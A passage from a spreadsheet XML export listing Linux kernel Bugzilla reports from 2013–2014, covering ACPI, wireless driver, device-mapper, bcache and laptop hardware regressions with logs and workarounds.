1800,00MHz BogoMips : 0,00 Byte Order : Big Endian PCI Devices ----------- -PCI Devices- Host bridge : PA Semi, Inc PWRficient Host Bridge Memory controller : PA Semi, Inc PWRficient L2 Cache PIC : PA Semi, Inc PWRficient System/Debug Controller RAM memory : PA Semi, Inc PWRficient DDR2 Memory Controller RAM memory : PA Semi, Inc PWRficient DDR2 Memory Controller Power PC : PA Semi, Inc PA6T Core Power PC : PA Semi, Inc PA6T Core PCI bridge : PA Semi, Inc PWRficient PCI-Express Port PCI bridge : PA Semi, Inc PWRficient PCI-Express Port PCI bridge : PA Semi, Inc PWRficient PCI-Express Port PCI bridge : PA Semi, Inc PWRficient PCI-Express Port PCI bridge : PA Semi, Inc PWRficient PCI-Express Port PCI bridge : PA Semi, Inc PWRficient PCI-Express Port PCI bridge : PA Semi, Inc PWRficient PCI-Express Port PCI bridge : PA Semi, Inc PWRficient PCI-Express Port Ethernet controller : PA Semi, Inc PWRficient Gigabit Ethernet Ethernet controller : PA Semi, Inc PWRficient Gigabit Ethernet Ethernet controller : PA Semi, Inc PWRficient Gigabit Ethernet Ethernet controller : PA Semi, Inc PWRficient Gigabit Ethernet Ethernet controller : PA Semi, Inc PWRficient 10-Gigabit Ethernet Ethernet controller : PA Semi, Inc PWRficient 10-Gigabit Ethernet DMA controller : PA Semi, Inc PWRficient DMA Controller System peripheral : PA Semi, Inc PWRficient SERDES SMBus : PA Semi, Inc PWRficient SMBus Controller SMBus : PA Semi, Inc PWRficient SMBus Controller SMBus : PA Semi, Inc PWRficient SMBus Controller Serial controller : PA Semi, Inc PWRficient 16550 UART Serial controller : PA Semi, Inc PWRficient 16550 UART ISA bridge : PA Semi, Inc PWRficient LPC/Localbus Interface VGA compatible controller : Advanced Micro Devices, Inc. [AMD/ATI] Barts XT [Radeon HD 6870] Audio device : Advanced Micro Devices, Inc. [AMD/ATI] Barts HDMI Audio [Radeon HD 6800 Series] SATA controller : Advanced Micro Devices, Inc. [AMD/ATI] SB600 Non-Raid-5 SATA USB controller : Advanced Micro Devices, Inc. [AMD/ATI] SB600 USB USB controller : Advanced Micro Devices, Inc. [AMD/ATI] SB600 USB USB controller : Advanced Micro Devices, Inc. [AMD/ATI] SB600 USB USB controller : Advanced Micro Devices, Inc. [AMD/ATI] SB600 USB USB controller : Advanced Micro Devices, Inc. [AMD/ATI] SB600 USB USB controller : Advanced Micro Devices, Inc. [AMD/ATI] SB600 USB Controller SMBus : Advanced Micro Devices, Inc. [AMD/ATI] SBx00 SMBus Controller IDE interface : Advanced Micro Devices, Inc. [AMD/ATI] SB600 IDE Audio device : Advanced Micro Devices, Inc. [AMD/ATI] SBx00 Azalia ISA bridge : Advanced Micro Devices, Inc. [AMD/ATI] SB600 PCI to LPC Bridge PCI bridge : Advanced Micro Devices, Inc. [AMD/ATI] SBx00 PCI to PCI Bridge Ethernet controller : Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ Other information about the system: http://en.wikipedia.org/wiki/AmigaOne_X1000 http://www.supertuxkart-amiga.de/amiga/x1000.html http://en.wikipedia.org/wiki/Common_Firmware_Environment</t>
  </si>
  <si>
    <t>No ac_adapter notifications, even after acpi -a</t>
  </si>
  <si>
    <t>2013-12-27 19:18 UTC</t>
  </si>
  <si>
    <t>2014-01-07 06:31 UTC</t>
  </si>
  <si>
    <t>Everytime I had problems with AC adapter notifications on my laptop. However, before 3.13 there was a workaround - let acpid call "acpi -a" when battery starts charging/discharging. After that, adapter's state updates. Today I built 3.13-rc5, and this workaround doesn't help anymore. "acpi -a" tells that adapter is offline, but acpi_listen doesn't show "ac_adapter" event, and UPower (and hence KDE's PowerDevil) thinks that adapter is still online (i've checked UPower using qdbus). On kernel 3.12.6 the workaround does its job. Also, isn't it possible to do something like my workaround in the kernel?</t>
  </si>
  <si>
    <t>Kernel panic - not syncing (on system start)</t>
  </si>
  <si>
    <t>2013-12-30 00:34 UTC</t>
  </si>
  <si>
    <t>2014-02-10 02:03 UTC</t>
  </si>
  <si>
    <t>[1.] One line summary of the problem: [Medion P8610] 13.10: Kernel panic - not syncing (on system start) [2.] Full description of the problem/report: While booting linux crashes with the message "Kernel panic - not syncing: Attempt to kill init! exitcode=0x00000009". In a bisect (done by Joseph Salisbury [joseph.salisbury@canonical.com]) it was tested and this bug seems to be introduced either by commit 76a6225bf0b64572251a8c27d33e84afac6af713 Author: Bob Moore &lt;robert.moore@intel.com&gt; Date: Fri Mar 8 09:23:16 2013 +0000 ACPICA: Split object conversion functions to a new file or commit d5a36100f62fa6db5541344e08b361b34e9114c5 Author: Bob Moore &lt;robert.moore@intel.com&gt; Date: Fri Mar 8 09:23:03 2013 +0000 ACPICA: Add mechanism for early object repairs on a per-name basis [3.] Keywords (i.e., modules, networking, kernel): kernel, Ubuntu, ACPICA [4.] Kernel version (from /proc/version): --&gt; unable to boot therefore impossible to get [5.] No Oops.. message [6.] Beyond skill level [7.] Environment --&gt; unable to boot therefore impossible to execute the command [7.1.] Software: --&gt; unable to boot therefore impossible to get [7.2.] Processor information (from /proc/cpuinfo): --&gt; unable to boot therefore impossible to get anything useful [7.3.] Module information (from /proc/modules): --&gt; unable to boot therefore impossible to get anything useful [7.4.] Loaded driver and hardware information (/proc/ioports, /proc/iomem) --&gt; unable to boot therefore impossible to get anything useful [7.5.] PCI information ('lspci -vvv' as root) --&gt; unable to boot therefore impossible to get anything useful [7.6.] SCSI information (from /proc/scsi/scsi) --&gt; unable to boot therefore impossible to get anything useful [7.7.] Other information that might be relevant to the problem (please look in /proc and include all information that you think to be relevant): --&gt; unable to boot therefore impossible to get anything useful [X.] Other notes, patches, fixes, workarounds: https://bugs.launchpad.net/bugs/1242938</t>
  </si>
  <si>
    <t>thin-pool: space map common: unable to decrement a reference count below 0</t>
  </si>
  <si>
    <t>3.12.6</t>
  </si>
  <si>
    <t>2014-01-16 12:30 UTC</t>
  </si>
  <si>
    <t>Apollon Oikonomopoulos</t>
  </si>
  <si>
    <t>2014-03-18 13:58 UTC</t>
  </si>
  <si>
    <t>Hi, We are using a thin LV as a backing store for a MySQL database, in order to be able to provide writable, point-in-time clones of the database. Our layout is as follows: LV VG Attr LSize Pool Origin Data% Move Log Copy% Convert mysql data Vwi-aotz- 70.00g thinpool 74.44 mysql-1389783211 data Vwi-a-tz- 70.00g thinpool mysql 74.38 mysql-1389783211.t7 data Vwi-aotz- 70.00g thinpool mysql-1389783211 74.38 thinpool data twi-a-tz- 100.00g 57.16 - mysql is the source LV which is constantly written to by a MySQL instance running on the machine. - mysql-&lt;timestamp&gt; are snapshots of "mysql", which are not exported/mounted anywhere and are used purely for rollback purposes of the 2nd-level snapshots below. - mysql-&lt;timestamp&gt;.&lt;name&gt; are snapshots of mysql-&lt;timestamp&gt;, exported to other machines via iSCSI. We run v3.12.6 stable, which AFAICT from git has the same device-mapper code as master, regarding thin provisioning and space maps. We were hit by the following error twice within 3 days: Jan 15 20:15:44 zarniwoop kernel: [101754.726823] device-mapper: space map common: unable to decrement a reference count below 0 Jan 15 20:15:44 zarniwoop kernel: [101754.735191] device-mapper: thin: 253:6: dm_thin_insert_block() failed: error = -22 Jan 15 20:15:44 zarniwoop kernel: [101754.742845] device-mapper: thin: 253:6: switching pool to read-only mode As expected, all subsequent write operations on the pool fail. One thing we would like to stress, is that we use ext4 with discards for these LVs, which might have something to do with the refcount issue: /dev/mapper/data-mysql on /var/lib/mysql type ext4 (rw,relatime,discard,nobarrier,stripe=16,data=ordered) Both, syslog and the hardware report no other errors or suspicious messages at or around the error time and the system has mild I/O activity. Please let us know if you need more information or you want us to test patches. Regards, Apollon</t>
  </si>
  <si>
    <t>3.12.7</t>
  </si>
  <si>
    <t>Battery information is missing on ASUS T100TA</t>
  </si>
  <si>
    <t>3.13-rc8</t>
  </si>
  <si>
    <t>2014-01-20 05:26 UTC</t>
  </si>
  <si>
    <t>Aubrey Li</t>
  </si>
  <si>
    <t>2014-12-22 08:47 UTC</t>
  </si>
  <si>
    <t>70401 82651</t>
  </si>
  <si>
    <t>Created attachment 122651 [details] DSDT table on ASUS T100TA The problem surface is the battery device PNP0C0A not created under /sys. When dig into it, I found _STA of battery device return ZERO. DSDT.dsl is attached. Please let me know if I need provide further information. Thanks, -Aubrey</t>
  </si>
  <si>
    <t>moxa: TX descriptor length bits not cleared between sends</t>
  </si>
  <si>
    <t>ARM Linux</t>
  </si>
  <si>
    <t>2014-01-20 10:21 UTC</t>
  </si>
  <si>
    <t>Jonas Jensen</t>
  </si>
  <si>
    <t>2014-10-06 07:17 UTC</t>
  </si>
  <si>
    <t>TX_DESC1_BUF_SIZE_MASK is not added to bits that are cleared, before the TX buffer length is set. Failing to do so can cause the controller to drop dead i.e. all TX interrupts stop, resulting in complete communication failure.</t>
  </si>
  <si>
    <t>moxa: build_skb() memory corruption</t>
  </si>
  <si>
    <t>2014-01-20 10:24 UTC</t>
  </si>
  <si>
    <t>Tevii S471 / TS2020/DS3000: Locks to incorrect transponder when entering specific frequency only affects newer driver.</t>
  </si>
  <si>
    <t>2014-01-20 17:00 UTC</t>
  </si>
  <si>
    <t>Mark Clarkstone</t>
  </si>
  <si>
    <t>2014-02-07 13:26 UTC</t>
  </si>
  <si>
    <t>= First time bug reporting so please bare with me! = I have a Tevii S471 that I use to receive Astra 28E here in the UK using the newer TS2020/DS3000 driver [I'm not sure what version it is, but the ds3000.c code is different in older kernels], the card t</t>
  </si>
  <si>
    <t>[iwlwifi] a lot of firmware errors</t>
  </si>
  <si>
    <t>2014-01-26 20:18 UTC</t>
  </si>
  <si>
    <t>Nikolay Amiantov</t>
  </si>
  <si>
    <t>2014-03-10 22:25 UTC</t>
  </si>
  <si>
    <t>Created attachment 123411 [details] dmesg There is lots of firmware errors dumping into dmesg once I try to connect to my network. Surprisingly, WLAN works even with this (though there was time when it wasn't), but this definitely isn't right. Steps to reproduce: 1. Start connecting to some network (I use NetworkManager) 2. Check dmesg</t>
  </si>
  <si>
    <t>iwlwifi BGN SKU: BAD_COMMAND when scheduled scan is configured</t>
  </si>
  <si>
    <t>2014-01-28 08:41 UTC</t>
  </si>
  <si>
    <t>2014-05-08 05:41 UTC</t>
  </si>
  <si>
    <t>Created attachment 123621 [details] dmesg After long period of work, connection to wifi was suddenly lost, and a lot of orrors (see dmesg) started flooding to dmesg. NetworkManager was unable to reconnect to the network again, I've tried to switch wifi on/off with rfkill, and finally reloaded the module, which fixed that. This may be a regression since I haven't seen something like that in 3.12.8. Dmesg attached.</t>
  </si>
  <si>
    <t>Samsung NP-R522H hangs on second wakeup from standby</t>
  </si>
  <si>
    <t>2014-01-28 18:44 UTC</t>
  </si>
  <si>
    <t>David</t>
  </si>
  <si>
    <t>2014-01-31 10:54 UTC</t>
  </si>
  <si>
    <t>My Laptop (Samsung NP-R522H) hangs on wakeup everytime I try to use standby/suspend more than once without restarting. I only see the most recent dmesg as usual before the GUI reloads but then nothing happens. With Kernel 3.12.9 it still works. Which logfiles could I supply that would help diagnose the problem (sorry I don't know much about kernel development)?</t>
  </si>
  <si>
    <t>acpi_no_auto_ssdt bug or not ?</t>
  </si>
  <si>
    <t>3.2.54</t>
  </si>
  <si>
    <t>2014-01-30 08:01 UTC</t>
  </si>
  <si>
    <t>Enrico Etxe Arte</t>
  </si>
  <si>
    <t>2014-06-11 00:20 UTC</t>
  </si>
  <si>
    <t>I'm compiling for a Toshiba Satellite Pro L300 I have a custom fixed DSDT with SSDT embedded on it I removed the forced copy of DSDT when Satellite is detected I have acpi_no_auto_ssdt on the kernel command line The auxiliary SSDT wont load, but the primary still allways loaded , why ?? My first question, is that a bug or i mess something ?</t>
  </si>
  <si>
    <t>Touchpad doesn't work on Fujitsu U574 laptop (needs i8042.notimeout)</t>
  </si>
  <si>
    <t>3.13.0-35</t>
  </si>
  <si>
    <t>2014-01-30 15:48 UTC</t>
  </si>
  <si>
    <t>Jason Robinson</t>
  </si>
  <si>
    <t>2014-10-24 09:40 UTC</t>
  </si>
  <si>
    <t>Touchpad isn't recognized after clean Ubuntu 13.10 install on Fujitsu U574 laptop. Running 'cat /proc/bus/input/devices' shows: Name="ImPS/2 Generic Wheel Mouse" Added GRUB params as per bug https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1244634: To /etc/default/grub, add to GRUB_CMDLINE_LINUX_DEFAULT: i8042.notimeout i8042.nomux And then: sudo update-grub &amp;&amp; sudo reboot This solves the issue, touchpad now works after reboot and after suspend. Ubuntu 13.10 x86_64 Kernel: linux-image-3.11.0-15-generic 3.11.0-15.23 dmi.bios.date: 10/07/2013 dmi.bios.vendor: FUJITSU // Phoenix Technologies Ltd. dmi.bios.version: Version 1.21 dmi.board.name: FJNBB34 dmi.board.vendor: FUJITSU dmi.chassis.type: 10 dmi.chassis.vendor: FUJITSU dmi.modalias: dmi:bvnFUJITSU//PhoenixTechnologiesLtd.:bvrVersion1.21:bd10/07/2013:svnFUJITSU:pnLIFEBOOKU574:pvr:rvnFUJITSU:rnFJNBB34:rvr:cvnFUJITSU:ct10:cvr: dmi.product.name: LIFEBOOK U574 dmi.sys.vendor: FUJITSU ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-3.11.0-15-generic.efi.signed root=/dev/mapper/ubuntu--vg-root ro quiet splash i8042.notimeout i8042.nomux vt.handoff=7</t>
  </si>
  <si>
    <t>setting CONFIG_HZ_PERIODIC locks cpu at the lowest frequency using ONDEMAND</t>
  </si>
  <si>
    <t>3.13.1</t>
  </si>
  <si>
    <t>2014-02-01 20:09 UTC</t>
  </si>
  <si>
    <t>j.fikar</t>
  </si>
  <si>
    <t>2016-05-18 01:09 UTC</t>
  </si>
  <si>
    <t>With CONFIG_HZ_PERIODIC=y cpu stays at the lowest frequcency 800MHz even if usage goes to 100%, frequency does not scale up, the governor in use is ondemand. Neither works conservative. Performance and userspace governors work as expected. With CONFIG_NO_HZ_IDLE or CONFIG_NO_HZ_FULL cpu scales up with ondemand as expected. Cpu is amd10h and uses CONFIG_X86_ACPI_CPUFREQ.</t>
  </si>
  <si>
    <t>3.14 Fedora Rawhide kernels crash with a divide error in intel_pstate on Bay Trail-m (Dell Venue 8 Pro)</t>
  </si>
  <si>
    <t>2014-02-02 21:26 UTC</t>
  </si>
  <si>
    <t>2015-07-21 18:48 UTC</t>
  </si>
  <si>
    <t>I've been fiddling with running Fedora on the Dell Venue 8 Pro - a Bay Trail-m based tablet device - for some time. We've made some progress with 3.13 kernels - see https://bugzilla.kernel.org/show_bug.cgi?id=67861 , https://bugzilla.kernel.org/show_bug.cgi?id=67911 , https://bugzilla.kernel.org/show_bug.cgi?id=65841 , for e.g. Things seem to have regressed with 3.14 kernels, though. I've built three images with a 3.14 kernel so far - using Fedora Rawhide's kernel, and applying a few small vlv-specific patches, simplify-efi-initialization and allow-mapping-bgrt-on-x86-32 from https://bugzilla.kernel.org/show_bug.cgi?id=67911 , and a patch that reverts commit 6c4a8962a4a078cacfc8eb5d4bd79f6343b8cd7a (see https://bugs.freedesktop.org/show_bug.cgi?id=71977#c18 ). With each of these images, the boot process reaches grub fine, but when proceeding from there, just hangs at "Booting a command list", which is a grub message. I don't see anything at all from the kernel - it just gets stuck, apparently indefinitely, right there. Jan-Michael Brummer confirms seeing the same thing. These systems are somewhat notorious for having 32-bit UEFI firmwares, note. I'm doing a 32-bit UEFI boot on them, which is an unusual codepath. But it's known to work (at least, work better than this) in 3.11, 3.12 and 3.13.</t>
  </si>
  <si>
    <t>iwlwifi/mvm/rs.c:908: possible bad if test ?</t>
  </si>
  <si>
    <t>3.14-rc1</t>
  </si>
  <si>
    <t>2014-02-03 11:37 UTC</t>
  </si>
  <si>
    <t>2014-02-04 16:56 UTC</t>
  </si>
  <si>
    <t>[linux-3.14-rc1/drivers/net/wireless/iwlwifi/mvm/rs.c:908]: (warning) Logical conjunction always evaluates to false: EXPR &lt; 4 &amp;&amp; EXPR &gt; 14. Source code is WARN_ON_ONCE(rate-&gt;index &lt; IWL_RATE_MCS_0_INDEX &amp;&amp; rate-&gt;index &gt; IWL_RATE_MCS_9_INDEX); Maybe WARN_ON_ONCE(rate-&gt;index &lt; IWL_RATE_MCS_0_INDEX || rate-&gt;index &gt; IWL_RATE_MCS_9_INDEX); would be better code.</t>
  </si>
  <si>
    <t>bcache kernel error</t>
  </si>
  <si>
    <t>2014-02-05 07:19 UTC</t>
  </si>
  <si>
    <t>Govindarajan</t>
  </si>
  <si>
    <t>2015-07-23 00:18 UTC</t>
  </si>
  <si>
    <t>Created attachment 124591 [details] kernel log I have been using bcache with LIO in order to accelerate iscsi target. Today I seem to have hit a kernel/bcache bug, which caused my iscsi LUNs to go offline. ~# uname -a Linux storage1 3.13.1-031301-generic #201401291035 SMP Wed Jan 29 15:37:43 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux Feb 4 22:01:14 storage1 kernel: [15727.905294] ------------[ cut here ]------------ Feb 4 22:01:14 storage1 kernel: [15727.906064] kernel BUG at /home/apw/COD/linux/drivers/md/bcache/btree.c:1168! Feb 4 22:01:14 storage1 kernel: [15727.906854] invalid opcode: 0000 [#1] SMP Feb 4 22:01:14 storage1 kernel: [15727.907692] Modules linked in: joydev hid_generic usbhid hid ib_srpt ib_cm ib_sa ib_mad ib_core tcm_qla2xxx qla2xxx tcm_loop tcm_fc libfc scsi_transport_fc scsi_tgt iscsi_target_mod target_core_pscsi target_core_file target_core_iblock target_core_mod configfs kvm_amd kvm crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd eeepc_wmi nfsd asus_wmi auth_rpcgss sparse_keymap nfs_acl video mxm_wmi nfs lockd sunrpc fscache snd_hda_codec_hdmi radeon microcode dm_multipath scsi_dh psmouse serio_raw edac_core edac_mce_amd fam15h_power k10temp ttm snd_hda_codec_realtek drm_kms_helper sp5100_tco snd_hda_intel i2c_piix4 snd_hda_codec snd_hwdep snd_pcm drm snd_page_alloc snd_timer snd i2c_algo_bit soundcore wmi mac_hid nls_iso8859_1 it87 hwmon_vid lp parport pata_acpi bcache ixgbe dca ptp r8169 mii pps_core dm_mirror mdio pata_marvell dm_region_hash ahci dm_log libahci Feb 4 22:01:14 storage1 kernel: [15727.917407] CPU: 1 PID: 467 Comm: bcache_gc Not tainted 3.13.1-031301-generic #201401291035 Feb 4 22:01:14 storage1 kernel: [15727.918517] Hardware name: To be filled by O.E.M. To be filled by O.E.M./M5A99FX PRO R2.0, BIOS 2005 09/16/2013 Feb 4 22:01:14 storage1 kernel: [15727.919654] task: ffff88080efc1800 ti: ffff88080e328000 task.ti: ffff88080e328000 Feb 4 22:01:14 storage1 kernel: [15727.920765] RIP: 0010:[&lt;ffffffffa0128649&gt;] [&lt;ffffffffa0128649&gt;] __bch_btree_mark_key.part.23+0x239/0x280 [bcache] Feb 4 22:01:14 storage1 kernel: [15727.921829] RSP: 0018:ffff88080e329c38 EFLAGS: 00010246 Feb 4 22:01:14 storage1 kernel: [15727.922893] RAX: 0000000000000002 RBX: ffffc90014a081f8 RCX: 0000000000000200 Feb 4 22:01:14 storage1 kernel: [15727.924032] RDX: 0000000000000002 RSI: 0000000000000001 RDI: ffffc90014a081f8 Feb 4 22:01:14 storage1 kernel: [15727.925184] RBP: ffff88080e329c88 R08: 000007ffffffffff R09: 0000000000000001 Feb 4 22:01:14 storage1 kernel: [15727.926331] R10: 0000000000003fff R11: 0000001000000000 R12: 0000000000000000 Feb 4 22:01:14 storage1 kernel: [15727.927472] R13: ffff88080fb40020 R14: ffff88080cdc0000 R15: 0000000000000000 Feb 4 22:01:14 storage1 kernel: [15727.929845] FS: 00007f59cbfff700(0000) GS:ffff88083ec40000(0000) knlGS:0000000000000000 Feb 4 22:01:14 storage1 kernel: [15727.932282] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b Feb 4 22:01:14 storage1 kernel: [15727.933766] CR2: 00007f286309e000 CR3: 00000008101e1000 CR4: 00000000000407e0 Feb 4 22:01:14 storage1 kernel: [15727.935259] Stack: Feb 4 22:01:14 storage1 kernel: [15727.936735] 0000000000000000 00000000285bab28 ffff88080e329cb8 ffff880805092c00 Feb 4 22:01:14 storage1 kernel: [15727.938102] ffff88080e329c68 ffff880805092c00 ffff88080e329de0 ffff88080fb40020 Feb 4 22:01:14 storage1 kernel: [15727.939459] 0000000000000000 0000000000000000 ffff88080e329c98 ffffffffa012acef Feb 4 22:01:14 storage1 kernel: [15727.940931] Call Trace: Feb 4 22:01:14 storage1 kernel: [15727.942384] [&lt;ffffffffa012acef&gt;] __bch_btree_mark_key+0x1f/0x30 [bcache] Feb 4 22:01:14 storage1 kernel: [15727.943503] [&lt;ffffffffa012b101&gt;] btree_gc_mark_node+0x81/0x210 [bcache] Feb 4 22:01:14 storage1 kernel: [15727.944604] [&lt;ffffffff8173bbbe&gt;] ? __schedule+0x38e/0x700 Feb 4 22:01:14 storage1 kernel: [15727.947005] [&lt;ffffffffa012d1b5&gt;] bch_btree_gc_root+0x35/0x100 [bcache] Feb 4 22:01:14 storage1 kernel: [15727.948545] [&lt;ffffffffa012d51e&gt;] bch_btree_gc+0x29e/0x3b0 [bcache] Feb 4 22:01:14 storage1 kernel: [15727.949628] [&lt;ffffffff81098368&gt;] ? finish_task_switch+0x128/0x170 Feb 4 22:01:14 storage1 kernel: [15727.950708] [&lt;ffffffffa012d668&gt;] bch_gc_thread+0x38/0x120 [bcache] Feb 4 22:01:14 storage1 kernel: [15727.951780] [&lt;ffffffffa012d630&gt;] ? bch_btree_gc+0x3b0/0x3b0 [bcache] Feb 4 22:01:14 storage1 kernel: [15727.952835] [&lt;ffffffff8108c5c9&gt;] kthread+0xc9/0xe0 Feb 4 22:01:14 storage1 kernel: [15727.953811] [&lt;ffffffff8108c500&gt;] ? flush_kthread_worker+0xb0/0xb0 Feb 4 22:01:14 storage1 kernel: [15727.954740] [&lt;ffffffff817489bc&gt;] ret_from_fork+0x7c/0xb0 Feb 4 22:01:14 storage1 kernel: [15727.955683] [&lt;ffffffff8108c500&gt;] ? flush_kthread_worker+0xb0/0xb0 Feb 4 22:01:14 storage1 kernel: [15727.956702] Code: c8 44 89 55 b8 4c 89 5d b0 e8 54 57 01 00 84 c0 4c 8b 45 c0 44 8b 4d c8 44 8b 55 b8 4c 8b 5d b0 75 13 0f b7 43 0a e9 28 ff ff ff &lt;0f&gt; 0b 48 89 df e9 ec fe ff ff 4c 89 45 c0 44 89 4d c8 44 89 55 Feb 4 22:01:14 storage1 kernel: [15727.958896] RIP [&lt;ffffffffa0128649&gt;] __bch_btree_mark_key.part.23+0x239/0x280 [bcache] Feb 4 22:01:14 storage1 kernel: [15727.959956] RSP &lt;ffff88080e329c38&gt; Feb 4 22:01:14 storage1 kernel: [15727.967492] ---[ end trace 2753579642267b1f ]--- Feb 4 22:01:23 storage1 kernel: [15737.490923] ABORT_TASK: Found referenced iSCSI task_tag: 1595279 Feb 4 22:01:26 storage1 kernel: [15740.143816] ABORT_TASK: Found referenced iSCSI task_tag: 1595278</t>
  </si>
  <si>
    <t>Asus UX302LA: Backlight hotkays need acpi_osi=NULL workaround</t>
  </si>
  <si>
    <t>2014-02-07 11:41 UTC</t>
  </si>
  <si>
    <t>Oleksij Rempel</t>
  </si>
  <si>
    <t>2016-03-17 17:44 UTC</t>
  </si>
  <si>
    <t>88941 89401</t>
  </si>
  <si>
    <t>Created attachment 125091 [details] acpidump Backlit hotkays do not work on Asus UX302LA until "acpi_osi=" (acpi_osi without arguments). Probably it affects more then just backlight, for example blank screen issue. according to this part: Method (_INI, 0, NotSerialized) // _INI: Initialize { Store (0x07DC, OSYS) If (CondRefOf (\_OSI, Local0)) { If (_OSI ("Linux")) ... If (_OSI ("Windows 2012")) { Store (0x07DC, OSYS) } If (_OSI ("Windows 2013")) { Store (0x07DD, OSYS) } ... setting osi to NULL should be same as setting it to "Windows 2012", but for some reasons acpi_osi="Windows 2012" didn't worked for me. In both cases ACPI video driver doing the job, so i assume. this driver has some windows_8 check which is not triggered by osi=NULL.</t>
  </si>
  <si>
    <t>kernel crash on ath9k under heavy load</t>
  </si>
  <si>
    <t>3.12.9</t>
  </si>
  <si>
    <t>2014-02-13 23:58 UTC</t>
  </si>
  <si>
    <t>Max Sydorenko</t>
  </si>
  <si>
    <t>2014-12-12 14:50 UTC</t>
  </si>
  <si>
    <t>Created attachment 126001 [details] tarball with crashtool output for crashes and kernel config I am experiencing quite frequent kernel crashes on my thinkpad T410 used as a wireless router/home server. Crashes observed only when Atheros 9380 based miniPCIe card is used (with ath9k driver). They mostly associated with heavy wireless bandwidth use, especially when torrent client with lots of connections runs over wifi. Distro in use is ArchLinux i686. Crashes has been observed on the 3.12.x kernels, as well as on the 3.10.29 LTS kernel. It seems that I can observe this crashes only on the kernels buit by myself, not on the stock ARCH kernels. I can provide crash tool outputs (bt log ps concatenated into single file) for the several crash instances. I will also attach config file, which was used to build affected kernels. GCC 4.8.2 has been used. Please, let me know what useful extra information I can provide.</t>
  </si>
  <si>
    <t>acpi-video-backlight code should filter duplicate entries from brigthness values table (BCL)</t>
  </si>
  <si>
    <t>2014-02-14 09:04 UTC</t>
  </si>
  <si>
    <t>2014-03-04 02:54 UTC</t>
  </si>
  <si>
    <t>Created attachment 126081 [details] acpidump of Dell Latitude E6430 with the latest A14 BIOS See: http://www.spinics.net/lists/linux-acpi/msg48954.html For a patch fixing this, here is the commit msg explaining the issue: Some devices have duplicate entries in there brightness levels table, ie on my Dell Latitude E6430 the table looks like this: [ 3.686060] acpi backlight index 0, val 80 [ 3.686095] acpi backlight index 1, val 50 [ 3.686122] acpi backlight index 2, val 5 [ 3.686147] acpi backlight index 3, val 5 [ 3.686172] acpi backlight index 4, val 5 [ 3.686197] acpi backlight index 5, val 5 [ 3.686223] acpi backlight index 6, val 5 [ 3.686248] acpi backlight index 7, val 5 [ 3.686273] acpi backlight index 8, val 6 [ 3.686332] acpi backlight index 9, val 7 [ 3.686356] acpi backlight index 10, val 8 [ 3.686380] acpi backlight index 11, val 9 etc. Notice that brightness values 0-5 are all mapped to 5. This means that if userspace writes any value between 0 and 5 to the brightness sysfs attribute and then reads it, it will always return 0, which is somewhat unexpected. This is a problem for ie gnome-settings-daemon, which uses read-modify-write logic when the users presses the brightness up or down keys. This is done this way to take brightness changes from other sources into account. On this specific laptop what happens once the brightness has been set to 0, is that gsd reads 0, adds 5, writes 5, and on the next brightness up key press again reads 0, so things get stuck at the lowest brightness setting. Filtering out the duplicate table entries, makes any write to brightness read back as the written value as one would expect, fixing this. I've attached an acpidump of the laptop in question.</t>
  </si>
  <si>
    <t>6 second boot delay if processing SSDT tables</t>
  </si>
  <si>
    <t>2014-02-20 06:01 UTC</t>
  </si>
  <si>
    <t>2014-07-08 04:18 UTC</t>
  </si>
  <si>
    <t>Hi, On bugzilla https://bugzilla.redhat.com/show_bug.cgi?id=1055228 , Gareth reported 6 second boot delay on 3.12 kernel. Delay does not happen if acpi_no_auto_ssdt option is used, nor if kernel is compiled with various debug facilities like LOCKDEP (fedora kernel-debug variant). We tried to compile kernel with just CONFIG_ACPI_DEBUG=y, on that kernel issue was reproducible, but after enable printing messages, again issue disappeared (we tried acpi.debug_layer=0xffffffff together with acip.debug_level=0x0307ff4f and acip.debug_level=0x03000000, links to logs are provided in bugzilla). On affected kernels interesting dmesg part looks like below: [ 0.212035] [Firmware Bug]: ACPI: BIOS _OSI(Linux) query ignored [ 0.217930] ACPI: SSDT 0000000092e6ac18 003D3 (v01 PmRef Cpu0Cst 00003001 INTL 20121220) [ 0.218512] ACPI: Dynamic OEM Table Load: [ 0.218514] ACPI: SSDT (null) 003D3 (v01 PmRef Cpu0Cst 00003001 INTL 20121220) [ 0.222109] ACPI: SSDT 0000000092e6a618 005AA (v01 PmRef ApIst 00003000 INTL 20121220) [ 0.222792] ACPI: Dynamic OEM Table Load: [ 0.222799] ACPI: SSDT (null) 005AA (v01 PmRef ApIst 00003000 INTL 20121220) [ 0.226920] ACPI: SSDT 0000000092e69d98 00119 (v01 PmRef ApCst 00003000 INTL 20121220) [ 0.227495] ACPI: Dynamic OEM Table Load: [ 0.227497] ACPI: SSDT (null) 00119 (v01 PmRef ApCst 00003000 INTL 20121220) [ 6.812869] ACPI: Interpreter enabled With acpi_no_auto_ssdt option interesting part looks like this: [ 0.203230] [Firmware Bug]: ACPI: BIOS _OSI(Linux) query ignored [ 0.203595] ACPI Error: [SGMD] Namespace lookup failure, AE_NOT_FOUND (20130725/psargs-359) [ 0.203601] ACPI Error: Method parse/execution failed [\_SB_._OSC] (Node ffff880253859438), AE_NOT_FOUND (20130725/psparse-536) [ 0.206093] ACPI Error: [\_PR_.CPU0._PPC] Namespace lookup failure, AE_NOT_FOUND (20130725/psargs-359) [ 0.206102] ACPI Error: Method parse/execution failed [\_SB_.PCI0.LPCB.EC0_.SASU] (Node ffff8802538570a0), AE_NOT_FOUND (20130725/psparse-536) [ 0.206108] ACPI Error: Method parse/execution failed [\_SB_.PCI0.LPCB.EC0_.ECMI] (Node ffff880253857078), AE_NOT_FOUND (20130725/psparse-536) [ 0.206113] ACPI Error: Method parse/execution failed [\_SB_.PCI0.LPCB.EC0_._REG] (Node ffff880253856910), AE_NOT_FOUND (20130725/psparse-536) [ 0.206122] Fail in evaluating the _REG object of EC device. Broken bios is suspected. [ 0.206127] ACPI: Interpreter enabled Any help to solving this bug would be appreciate. I'm CCing Gareth, he can provide more informations if needed.</t>
  </si>
  <si>
    <t>Reboot quirks required for Baytrail-based tablets</t>
  </si>
  <si>
    <t>3.14rc3</t>
  </si>
  <si>
    <t>2014-02-21 02:38 UTC</t>
  </si>
  <si>
    <t>2015-07-21 19:20 UTC</t>
  </si>
  <si>
